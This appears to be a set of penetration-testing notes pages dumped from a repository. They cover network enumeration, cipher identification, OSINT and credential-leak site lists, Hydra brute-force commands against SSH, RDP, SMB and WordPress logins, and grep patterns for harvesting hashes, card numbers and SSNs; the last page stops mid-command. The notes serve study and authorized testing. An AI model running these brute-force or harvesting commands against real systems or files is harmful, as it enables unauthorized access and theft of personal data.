{% endhint %}

## MISC

Signing APK files: [IppSec:HHC2016 - Debug](https://www.youtube.com/watch?v=fcemTQaosOQ)

--------------------------------------------------------------------------------
/mobile/ios.md:
--------------------------------------------------------------------------------

# iOS

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

--------------------------------------------------------------------------------
/os-agnostic/basic-enumeration.md:
--------------------------------------------------------------------------------

# Basic Enumeration

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## Host Enumeration

### Live host enumeration with cmd.exe

```batch
for /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "TTL="
```

### Hostname enumeration with `host` (Linux)

Uses DNS reverse lookups to find the hostname for each IP in a range. This example scans the subnet 10.10.10.0/24.

```bash
for ip in $(seq 1 254); do host 10.10.10.$ip; done | grep -v "not found"
```

## Port Scanning

### Nmap

A basic bash script for doing enumeration based on a list of IPs gathered from a ping sweep of a network.

```bash
#!/bin/bash
# Ping sweep the subnet and keep only the addresses of hosts that answered.
# Grepable output (-oG) puts the IP in the second field of every "Status: Up" line.
nmap -sn -oG - 192.168.1.0/24 | awk '/Up$/{print $2}' > ip_list

# Full TCP port scan with default scripts and version detection against each live host
while read -r ip
do
    nmap -sCV -p- -vvv -oA "$ip.map" "$ip"
done < ip_list
```

The options I regularly use are:

| `Flag` | Purpose |
| --- | --- |
| `-p-` | A shortcut which tells nmap to scan all ports |
| `-vvv` | Gives very verbose output so I can see the results as they are found, and also includes some information not normally shown |
| `-sC` | Equivalent to `--script=default` and runs a collection of nmap enumeration scripts against the target |
| `-sV` | Does a service version scan |
| `-oA $name` | Saves all three formats (standard, greppable, and XML) of output with a filename of `$name` |

### NmapAutomator

NmapAutomator by @21y4d ([https://github.com/21y4d/nmapAutomator](https://github.com/21y4d/nmapAutomator)) is a great tool for automating your basic enumeration. I highly recommend learning how to do it manually so you know what is happening behind the scenes. It is a very noisy tool, best suited to CTF-type environments rather than real Red Team engagements.

### Port scanning with netcat

Scanning all ports this way is not recommended, as it takes a very long time. It is better used for targeted scans of a few ports, and only when better tools are not available. Netcat reports results on stderr, so redirect it before filtering.

#### TCP:

```bash
nc -n -vv -w 1 -z $ip 1-65535 2>&1 | grep "open"
```

#### UDP:

```bash
nc -n -v -u -z -w 1 $ip 1-65535 2>&1 | grep "open"
```

### Masscan

[https://github.com/robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan)

Masscan is an incredibly fast network scanner. Using it to find open ports, then feeding the results to nmap for a more thorough enumeration, can speed things up.
Masscan requires `sudo` privileges to run.

```
sudo masscan -p 0-65535 10.10.10.0/24 --rate=1000
```

## SMB/Samba

## NetBIOS

```
sudo nbtscan -r 10.10.10.0/24
```

Does an NBT name scan using source port 137 (`-r`).

--------------------------------------------------------------------------------
/os-agnostic/cryptography-and-encryption.md:
--------------------------------------------------------------------------------

# Cryptography & Encryption

## Cryptography

{% embed url="https://pequalsnp-team.github.io/cheatsheet/crypto-101" %}

## Ciphers

* [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking) <-- useful site which can help identify the type of cipher.
* [https://www.dcode.fr](https://www.dcode.fr) <-- one of the best sites I have found, with decoders for many types of ciphers.
* [Cyber Chef](https://gchq.github.io/CyberChef/) <-- very useful for chained ciphers which require several steps to solve. Can decrypt certificates.

### Fernet

Fernet (symmetric encryption) **looks like base64** but decodes to unreadable binary, in two parts; the first part (32 bytes) is the key. It uses 128-bit AES in CBC mode with PKCS7 padding, and HMAC-SHA256 for authentication. The IV is generated with `os.urandom()`.

Decode Fernet @ [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode) <-- Will also give the IV and timestamp (could be useful!)
More info about this @ [https://cryptography.io/en/latest/fernet](https://cryptography.io/en/latest/fernet)

```python
from cryptography.fernet import Fernet

# ========== encrypt
key = Fernet.generate_key()          # url-safe base64; 32 random bytes once decoded
f = Fernet(key)
token = f.encrypt(b"this is my key")
# key and token are bytes, so decode them before joining them with str
print('the key is ' + key.decode() + '\nThe cipher text is ' + token.decode())

# ========== decrypt
key = b'input key here'      # paste the key here
f = Fernet(key)
token = b'cipher text here'  # paste the token here
print(f.decrypt(token))
```

### Malbolge

Malbolge is an esoteric programming language (named after the eighth circle of Dante's Inferno) that is used in some CTF challenges. **Text from base64 looks like random text**, but it is complete garbage (much of it unprintable). Read more at [https://en.wikipedia.org/wiki/Malbolge](https://en.wikipedia.org/wiki/Malbolge) and [https://www.tutorialspoint.com/execute_malbolge_online.php](https://www.tutorialspoint.com/execute_malbolge_online.php)

### BrainFuck

A programming language that uses a series of only `+-.[]<>` characters. A sample BrainFuck program looks like this:

```
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>----.>++++++++++++++.-----------------.++++++++.+++++.--------.+++++++++++++++.------------------.++++++++.
```

Decode using [https://www.dcode.fr/brainfuck-language](https://www.dcode.fr/brainfuck-language)

### OOK!

Uses only the word `ook` paired with punctuation marks (`.!?`). The shorthand form leaves out `ook` and looks like this:

```
....................!?.?...?.......?...............?....................?.?.?.?.!!?!.?.?.?..................!.!.!!!!!!!!!.?.......!.
```

Decode using [https://www.dcode.fr/ook-language](https://www.dcode.fr/ook-language)

## Test for Plaintext Output from a (Python) Script

```python
import string

# Checks the output from a crypto routine and returns True if at least 60% of
# the characters are ASCII letters, which suggests possible plaintext.
def is_plaintext(ptext):
    if isinstance(ptext, bytes):
        ptext = ptext.decode('latin-1')  # accept raw bytes from a decrypt call
    if len(ptext) == 0:
        return False
    num_letters = sum(1 for c in ptext if c in string.ascii_letters)
    return num_letters / len(ptext) >= .6
```

If this function is giving false positives/negatives, it can be tweaked by altering the number in the line:

```python
    return num_letters / len(ptext) >= .6
```

`0.6` has been tested as working for simple CTF usage.

## Digital Certificates

X.509

[https://8gwifi.org/PemParserFunctions.jsp](https://8gwifi.org/PemParserFunctions.jsp) -- extract information from various digital certificates

## SSH Keys

For those interested in the details, you can see what is inside a public key file with:

```bash
openssl rsa -noout -text -inform PEM -in key.pub -pubin
```

or, for the private key file:

```bash
openssl rsa -noout -text -in key.private
```

which prints the actual components of the key (modulus, exponents, primes, ...) as text on the console.

Extract the public key from a private key:

```bash
openssl rsa -in privkey.pem -pubout -out key.pub
```

## Encryption/Decryption

[https://www.devglan.com/online-tools/aes-encryption-decryption](https://www.devglan.com/online-tools/aes-encryption-decryption)

[CyberChef](https://gchq.github.io/CyberChef/): Website for encryption/decryption of many different types at the same time

Good cipher tools: [http://rumkin.com/](http://rumkin.com/)

One-time pad: `pt - ct = key`

Decrypt with an RSA private key: `openssl rsautl -decrypt -inkey $key_file < $pass.crypt` (`$pass.crypt` is a hex file?
encrypted contents of the public key?)

* [Ippsec:HacktheBox - Charon](https://www.youtube.com/watch?v=_csbKuOlmdE)

### Decrypt LDAP Passwords

[https://dotnetfiddle.net/2RDoWz](https://dotnetfiddle.net/2RDoWz)

```csharp
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

public class Program
{
    public static void Main()
    {
        // Change these three variables to decode your own; you need the key and IV to decode!
        string ciphertext = "BQO5l5Kj9MdErXx6Q6AGOw==";
        string key = "c4scadek3y654321";
        string iv = "1tdyjCbY1Ix49842";

        string plaintext = DecryptString(ciphertext, key, iv);
        Console.WriteLine(plaintext);
    }

    // AES-128-CBC decryption of a base64 ciphertext, with the key and IV given as UTF-8 strings
    public static string DecryptString(string EncryptedString, string Key, string iv)
    {
        byte[] buffer = Convert.FromBase64String(EncryptedString);
        Aes aes = Aes.Create();
        aes.KeySize = 128;
        aes.BlockSize = 128;
        aes.IV = Encoding.UTF8.GetBytes(iv);
        aes.Mode = CipherMode.CBC;
        aes.Key = Encoding.UTF8.GetBytes(Key);
        using (MemoryStream memoryStream = new MemoryStream(buffer))
        {
            using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
            {
                // The plaintext is never longer than the ciphertext (padding is stripped), so this buffer is large enough
                byte[] numArray = new byte[buffer.Length];
                int count = cryptoStream.Read(numArray, 0, numArray.Length);
                return Encoding.UTF8.GetString(numArray, 0, count);
            }
        }
    }
}
```

Decodes to: `w3lc0meFr31nd`

If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!

--------------------------------------------------------------------------------
/os-agnostic/network-hardware.md:
--------------------------------------------------------------------------------

# Network Hardware

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

[https://www.bettercap.org/](https://www.bettercap.org/)

[https://miloserdov.org/?p=1112#1](https://miloserdov.org/?p=1112#1)

## Default credentials/configurations

[https://www.routerdefaults.org/](https://www.routerdefaults.org/)

{% embed url="https://www.routerpasswords.com/" %}

--------------------------------------------------------------------------------
/os-agnostic/os_agnostic.md:
--------------------------------------------------------------------------------

---
description: >-
  TODO: Rename this to something more interesting or appropriate, pull out stuff
  to its own section.
---

# OS Agnostic

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

--------------------------------------------------------------------------------
/os-agnostic/osint.md:
--------------------------------------------------------------------------------

# OSINT

## OSINT Multitool

{% embed url="https://osintframework.com/" %}
Mind map of many, many OSINT tools and websites
{% endembed %}

## Google Account Enumeration

{% embed url="https://medium.com/week-in-osint/getting-a-grasp-on-googleids-77a8ab707e43" %}

This writeup from Sector035 gives a detailed walkthrough of how to get a wealth of information from a Google account such as a @gmail.com email address.

{% hint style="danger" %}
Some of the steps for doing this require you to actually sign in to a Google account and add the target as a contact. A burner account or sock puppet is recommended if you are doing this for a real engagement.
{% endhint %}

[https://developers.google.com/identity/sign-in/web/people](https://developers.google.com/identity/sign-in/web/people)
[https://developers.google.com/people/api/rest/v1/people/get](https://developers.google.com/people/api/rest/v1/people/get)

## Multipurpose

* https://shodan.io/
* https://www.zoomeye.org/
* https://leakix.net/
* https://www.yougetsignal.com/
* https://intelx.io/
* https://pentest-tools.com/
* [https://osintframework.com/](https://osintframework.com/)

[RiskIQ’s Community Edition](https://www.riskiq.com/products/community-edition/) -

> Threat Hunter
>
> * Access the most comprehensive internet data sets available to track adversaries across the internet
> * Pivot across passive DNS, WHOIS, SSL certificates, web trackers, and more
> * Enrich internal controls and logs to uncover, understand, and respond to external threats
> * Monitor threat infrastructure for changes or new, similar artifacts
>
> Threat Defender
>
> * Understand your Digital Footprint® and how you’re exposed from the outside in
> * Discover unknown assets, exposures, and vulnerabilities
> * Get alerts when your brand or trademarked terms appear in new domains and WHOIS contact information
> * View digital assets details such as domain attributes, IP address, and registrant details

[https://censys.io/](https://censys.io/) - Attack surface enumeration

> Discover every asset in your attack surface, known or unknown.

## Domain/IP Recon

* https://domainbigdata.com/
* https://viewdns.info/
* http://bgp.he.net/
* https://rapiddns.io/
* https://dnsdumpster.com/
* https://www.whoxy.com/
* [http://whois.domaintools.com/](http://whois.domaintools.com/)

[https://www.robtex.com/](https://www.robtex.com/) - Good for geo-location of IP origin

> Robtex is used for various kinds of research of IP numbers, Domain names, etc
>
> Robtex uses various sources to gather public information about IP numbers, domain names, host names, Autonomous systems, routes etc. It then indexes the data in a big database and provides free access to the data.

[https://opendata.rapid7.com/sonar.fdns_v2/](https://opendata.rapid7.com/sonar.fdns_v2/)

> Project Sonar produces a [Forward DNS](https://scans.io/study/sonar.fdns_v2) dataset every week or so. This data is created by extracting domain names from a number of sources and then sending an `ANY` query for each domain. The sources used to build the list of domains include:
>
> * Reverse DNS (PTR) Records
> * Common Name and SubjectAltName fields from SSL Certificates
> * HTML elements and Location headers seen in HTTP responses
> * Zone files from COM, INFO, ORG, NET, BIZ, INFO and other TLDs
> * Zone files from gTLDs
>
> The data format is a gzip-compressed JSON file, where each line of the file is a JSON document with attributes for the record name, type, value and time of resolution.
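The quoted description above gives the record layout (a gzip-compressed file of JSON documents, one per line, each with the record name, type, value and resolution time), which is enough to work with a dataset like this from a script when inventorying the hostnames exposed under your own domain. The following is an added example, not code from this page or from Rapid7: it streams a constructed gzip JSON-lines blob, keeps only records for a target domain and its subdomains, and groups them by hostname. The field names `timestamp`, `name`, `type` and `value` are assumed from the public dataset, and the sample records are constructed.

```python
import gzip
import io
import json
from collections import defaultdict

# Constructed sample records in the shape described above: one JSON document per
# line with the record name, type, value and resolution time. The field names
# (timestamp, name, type, value) are assumed from the public dataset, not taken
# from this page; the hostnames and addresses are made up.
SAMPLE_RECORDS = [
    {"timestamp": "1609459200", "name": "www.example.com", "type": "a", "value": "93.184.216.34"},
    {"timestamp": "1609459200", "name": "mail.example.com", "type": "a", "value": "93.184.216.35"},
    {"timestamp": "1609459201", "name": "dev.example.com", "type": "cname", "value": "www.example.com"},
    {"timestamp": "1609459201", "name": "example.com", "type": "mx", "value": "10 mail.example.com"},
    {"timestamp": "1609459202", "name": "notexample.com", "type": "a", "value": "203.0.113.9"},
    {"timestamp": "1609459202", "name": "www.example.org", "type": "a", "value": "203.0.113.10"},
]


def build_sample_gzip():
    """Serialise the constructed records as a gzip-compressed JSON-lines blob."""
    lines = "\n".join(json.dumps(rec) for rec in SAMPLE_RECORDS) + "\n"
    return gzip.compress(lines.encode("utf-8"))


def iter_fdns(gz_bytes):
    """Stream records one line at a time so a multi-gigabyte file never has to fit in memory."""
    with gzip.open(io.BytesIO(gz_bytes), mode="rt", encoding="utf-8") as fh:
        for line in fh:
            line = line.strip()
            if not line:
                continue
            try:
                yield json.loads(line)
            except json.JSONDecodeError:
                # A corrupt line should not abort the whole pass over the dataset
                continue


def in_zone(name, domain):
    """True if name is the domain itself or a label-aligned subdomain of it.

    A plain substring check would also accept 'notexample.com', so compare on
    label boundaries and ignore case and a trailing dot.
    """
    name = name.lower().rstrip(".")
    domain = domain.lower().rstrip(".")
    return name == domain or name.endswith("." + domain)


def hostnames_for_domain(gz_bytes, domain):
    """Map each hostname under domain to the sorted (type, value) pairs seen for it."""
    found = defaultdict(set)
    for rec in iter_fdns(gz_bytes):
        name = rec.get("name", "")
        if in_zone(name, domain):
            host = name.lower().rstrip(".")
            found[host].add((rec.get("type", "").lower(), rec.get("value", "")))
    return {host: sorted(vals) for host, vals in sorted(found.items())}


if __name__ == "__main__":
    blob = build_sample_gzip()
    for host, records in hostnames_for_domain(blob, "example.com").items():
        print(host)
        for rtype, value in records:
            print(f"  {rtype:<6} {value}")
```

Matching on label boundaries (`in_zone`) matters: a substring test for `example.com` would also return `notexample.com`, which pads an attack-surface inventory with hosts that are not yours. Swap `build_sample_gzip()` for the bytes of a real download and the same functions apply.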

## Mail server blacklist enumerator

* http://multirbl.valli.org/

## Dark web exposure

* https://immuniweb.com/radar/

## New acquisitions

* https://crunchbase.com/

## Email

* https://hunter.io/
  * Email domain enumeration
* [https://emkei.cz/](https://emkei.cz/)
  * Fake email sender

## Social Media

### Social media search engine

* [https://kribrum.io/](https://kribrum.io/)
  * This page is in Russian!

### Accounts registered by email

* [emailrep.io](https://emailrep.io/)

### Enumerate usernames

* [https://whatsmyname.app/](https://whatsmyname.app/)

### Twitter

* [https://tinfoleak.com/](https://tinfoleak.com/)

### Instagram

* [https://www.searchmy.bio/](https://www.searchmy.bio/)

### Facebook

### Skype

* [https://mostwantedhf.info/](https://mostwantedhf.info/)

### Forums

* [https://boardreader.com/](https://boardreader.com/)

### Pastebin

* [https://psbdmp.ws/](https://psbdmp.ws/)

## Advanced Search

### Search with results grouped by topic

* [https://search.carrot2.org/](https://search.carrot2.org/)

### Search by Region/ Augmented keyword search

* [https://swisscows.com/](https://swisscows.com/)

### Source code search engines

* [https://publicwww.com/](https://publicwww.com/)
  * Can search by language or feature
* [https://searchcode.com/](https://searchcode.com/)
  * Search public repositories
* [https://www.shhgit.com/](https://www.shhgit.com/)
  * Searches for "secrets" inside git code repos
  * FOSS version at [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit)

## Credential Leak Sites

{% embed
url="https://haveibeenpwned.com" %}

Run by Troy Hunt, haveibeenpwned.com is one of the best sites for checking whether an email address has been involved in a credential breach.

{% hint style="danger" %}
Not all of the sites below are trustworthy. Do not enter any credentials that are in use, or that you plan to use, into any of these searches!
{% endhint %}

* https://link-base.org/index.php
* http://xjypo5vzgmo7jca6b322dnqbsdnp3amd24ybx26x5nxbusccjkm4pwid.onion/
* http://pwndb2am4tzkvold.onion
* https://weleakinfo.to/
* https://www.dehashed.com/search?query=
* https://rslookup.com
* https://leakcheck.net
* https://snusbase.com
* https://leakpeek.com
* https://breachchecker.com
* https://leak-lookup.com
* https://leakcheck.io
* http://scylla.sh
* http://scatteredsecrets.com
* https://joe.black/leakengine.html
* https://services.normshield.com/data-breach
* https://leakedsource.ru/main/
* https://leaked.site/
* https://ghostproject.fr/
* https://haveibeensold.app/
* https://vigilante.pw/
* https://nuclearleaks.com/
* https://hashes.org/
* https://leak.sx/
* https://leakcorp.com/login
* https://private-base.info/
* https://4iq.com/
* https://intelx.io
* https://leakprobe.net

--------------------------------------------------------------------------------
/os-agnostic/password-cracking/README.md:
--------------------------------------------------------------------------------

# Password Cracking

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## Headings:

This page was getting long, so here are shortcuts to the major sections. I broke these out into separate pages for better organization and searchability.

* [Getting the hashes](gathering-the-hashes.md)
* [Wordlist manipulation](wordlist-manipulation.md)
* [Cracking the Hashes](cracking-the-hashes.md)

Not all methods of discovering passwords involve directly "cracking" hashes. Brute forcing logins and direct recovery programs are also viable solutions.

## Default Credentials

Search using your favorite web search engine for default credentials of the technology that is being used, or try the following compilation lists:

* [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet)
* [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html)
* [**http://www.vulnerabilityassessment.co.uk/passwordsC.htm**](http://www.vulnerabilityassessment.co.uk/passwordsC.htm)
* [**https://192-168-1-1ip.mobi/default-router-passwords-list/**](https://192-168-1-1ip.mobi/default-router-passwords-list/)
* [**https://datarecovery.com/rd/default-passwords/**](https://datarecovery.com/rd/default-passwords/)
* [**https://bizuns.com/default-passwords-list**](https://bizuns.com/default-passwords-list)
* [**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv**](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv)
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
* 
[**https://www.cirt.net/passwords**](https://www.cirt.net/passwords)
* [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com)
* [**https://many-passwords.github.io/**](https://many-passwords.github.io)

## Wordlists

* [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists)
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
* [**https://github.com/kaonashi-passwords/Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi)
* [**https://github.com/google/fuzzing/tree/master/dictionaries**](https://github.com/carlospolop/hacktricks/tree/95b16dc7eb952272459fc877e4c9d0777d746a16/google/fuzzing/tree/master/dictionaries/README.md)
* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)

## Password Recovery

Password recovery programs: [https://www.passcape.com/products](https://www.passcape.com/products) (TODO: Test these!)

### ZIP Password Retrieval (with Known Plaintext)

_Download pkcrack_

[https://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack/download1.html](https://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack/download1.html)

! Before using, it must be built from source

_Syntax_

```bash
# -C/-P: the encrypted and the plaintext archive; -c/-p: the name of the file inside each archive
./pkcrack -C $encrypted.zip -c file -P $plaintext.zip -p file
```

## Brute forcing logins

An amazing index of brute-force commands: [https://book.hacktricks.xyz/brute-force](https://book.hacktricks.xyz/brute-force)

### Hydra

Below are a few scriptable examples to brute force logins of common protocols.

| Command | Description |
| --- | --- |
| `hydra -P $pass_list -v $ip snmp -vV` | SNMP: Brute force |
| `hydra -t 1 -l $user -P $pass_list -vV $ip ftp` | FTP: with known user, using password list |
| `hydra -vV -u -L $users_list -P $pass_list -t 1 -u $ip ssh` | SSH: using users list, and passwords list |
| `hydra -vV -u -L $users_list -p $pass -t 1 -u $ip ssh` | SSH: with a known password, and a username list |
| `hydra -vV $ip -s $port ssh -l $user -P $pass_list` | SSH: with known username on non-standard port |
| `hydra -vV -l $user -P $pass_list -f $ip pop3` | POP3: Brute Force |
| `hydra -vV -L $users_list -P $pass_list $ip http-get $login_page` | HTTP GET: with user list and pass list |
| `hydra -vV -t 1 -f -l $user -P $pass_list rdp://$ip` | Windows Remote Desktop: with known username, and pass list |
| `hydra -vV -t 1 -f -l $user -P $pass_list $ip smb` | SMB: brute force with known user, and pass list |
| `hydra -vV -l $user -P $pass_list $ip http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'` | WordPress: brute force an admin login |
| `hydra -vV -L $users_list -p $pass $ip http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'` | WordPress: enumerate users |
| `wpscan --url $url -U $user -P $pass_list` | Use wpscan to brute force password with known user |

#### Other useful Hydra options

**`-x min:max:charset` -** Generate passwords from min to max length. Charset can contain `1` for numbers, `a` for lowercase and `A` for uppercase characters. Any other character that is added is put in the list.
Example: `1:2:a1%.` The generated passwords will be of length 1 to 2 and contain lowercase letters, numbers and/or percent signs and periods/dots.

**`-e nsr` -** Do additional checks: `n` for null password, `s` try the login as the password, `r` try the reversed login as the password.

### crackmapexec

{% embed url="https://github.com/byt3bl33d3r/CrackMapExec" %}

[https://mpgn.gitbook.io/crackmapexec/](https://mpgn.gitbook.io/crackmapexec/)

## Resources

* [https://www.unix-ninja.com/p/A_cheat-sheet_for_password_crackers](https://www.unix-ninja.com/p/A_cheat-sheet_for_password_crackers)
* [https://github.com/frizb/](https://github.com/frizb/)
* [https://guide.offsecnewbie.com/password-cracking](https://guide.offsecnewbie.com/password-cracking)
* [https://www.hackingarticles.in/abusing-kerberos-using-impacket/](https://www.hackingarticles.in/abusing-kerberos-using-impacket/)

--------------------------------------------------------------------------------
/os-agnostic/password-cracking/gathering-the-hashes.md:
--------------------------------------------------------------------------------

# Gathering the Hashes

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## Extracting hashes from text files

### Extract md5 hashes

Using grep:

```bash
grep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' $hash_directory/* | grep -oE '[a-fA-F0-9]{32}' > $out_hash_file
```

Alternatively, with sed:

```bash
sed -rn 's/.*[^a-fA-F0-9]([a-fA-F0-9]{32})[^a-fA-F0-9].*/\1/p' $hash_directory/* > $out_hash_file
```

{% hint style="info" %}
The two regular expressions above can be used for SHA1, SHA256 and other unsalted hashes represented in hex. The only thing you need to do is change the value **`{32}`** to the corresponding length for your desired hash type.
{% endhint %}

### Extract MySQL-Old hashes

```bash
grep -oE "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" $hash_directory/* > $out_hash_file
```

### Extract blowfish (bcrypt) hashes

```bash
grep -oE '\$2a\$[0-9]{2}\$[./A-Za-z0-9]{53}' $hash_directory/* > $out_hash_file
```

### Extract Joomla hashes

```bash
grep -oE '[0-9a-zA-Z]{32}:\w{16,32}' $hash_directory/* > $out_hash_file
```

### Extract Vbulletin hashes

```bash
grep -oE '[0-9a-zA-Z]{32}:\S{3,32}' $hash_directory/* > $out_hash_file
```

### Extract phpBB3-MD5

```bash
grep -oE '\$H\$\S{31}' $hash_directory/* > $out_hash_file
```

### Extract Wordpress-MD5

```bash
grep -oE '\$P\$\S{31}' $hash_directory/* > $out_hash_file
```

### Extract Drupal 7

```bash
grep -oE '\$S\$\S{52}' $hash_directory/* > $out_hash_file
```

### Extract 'old' Unix-MD5

```bash
grep -oE '\$1\$[^$]{1,8}\$\S{22}' $hash_directory/* > $out_hash_file
```

### Extract MD5-APR1

```bash
grep -oE '\$apr1\$[^$]{1,8}\$\S{22}' $hash_directory/* > $out_hash_file
```

### Extract sha512crypt, SHA512 (Unix)

```bash
grep -oE \
'\$6\$[^$]{1,16}\$\S{86}' $hash_directory/* > $out_hash_file
```

## Extracting non-hash strings from text files

### Extract e-mails

```bash
grep -Eo '\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+\.[a-zA-Z0-9.-]+\b' $text_directory/* > $email_list
```

### Extract URLs (HTTP only)

```bash
grep -shoP 'http.*?[" >]' $text_directory/* > $HTTP_URL_list
```

### Extract URLs (HTTP, HTTPS, Gopher, FTP, mailto, etc)

```bash
grep -Eo '(((http|https|ftp|gopher)|mailto)[.:][^ >" ]*|www\.[-a-z0-9.]+)[^ .,; >">):]' $text_directory/* > $HTTP_URL_list
```

{% hint style="info" %}
**Note**: if grep returns "Binary file (standard input) matches", replace the non-printable bytes with dots first, using one of the following approaches:

**`cat *.log | tr '\000-\011\013-\037\177-\377' '.' | grep -E "$REGEX"`**

or

**`cat -v *.log | grep -Eo "$REGEX"`**
{% endhint %}

### Extract Floating point numbers

```bash
grep -Eo "^[-+]?[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?$" *.txt > floats.txt
```

### Extract credit card data

```bash
grep -Eo "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt        # Visa
grep -Eo "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt  # MasterCard
grep -Eo "\b3[47][0-9]{13}\b" *.txt > american-express.txt                          # American Express
grep -oP '\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b' *.txt > diners.txt                   # Diners Club (needs PCRE for the (?: group)
grep -Eo "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt        # Discover
grep -oP '\b(?:2131|1800|35\d{3})\d{11}\b' *.txt > jcb.txt                         # JCB (needs PCRE)
grep -Eo "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt                # AMEX, with separators
```

### Extract Social Security Number (SSN)

```bash
grep -Eo "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txt
```

### Extract Indiana Driver License Number
144 | 145 | `# grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > indiana-dln.txt` 146 | 147 | ### Extract US Passport Cards 148 | 149 | `# grep -E -o "C0[0-9]{7}" *.txt > us-pass-card.txt` 150 | 151 | ### Extract US Passport Number 152 | 153 | `# grep -E -o "[23][0-9]{8}" *.txt > us-pass-num.txt` 154 | 155 | ### Extract US Phone Numberss 156 | 157 | `# grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txt` 158 | 159 | ### Extract ISBN Numbers 160 | 161 | `# egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt` 162 | 163 | 164 | 165 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 166 | 167 | -------------------------------------------------------------------------------- /os-agnostic/password-cracking/wordlist-manipulation.md: -------------------------------------------------------------------------------- 1 | # Wordlist Manipulation 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | ## Wordlist Manipulation 10 | 11 | ### Password file merge, sort by unique entries: 12 | 13 | Sorts all files in a directory 14 | 15 | ```bash 16 | find . -maxdepth 1 -type f ! 
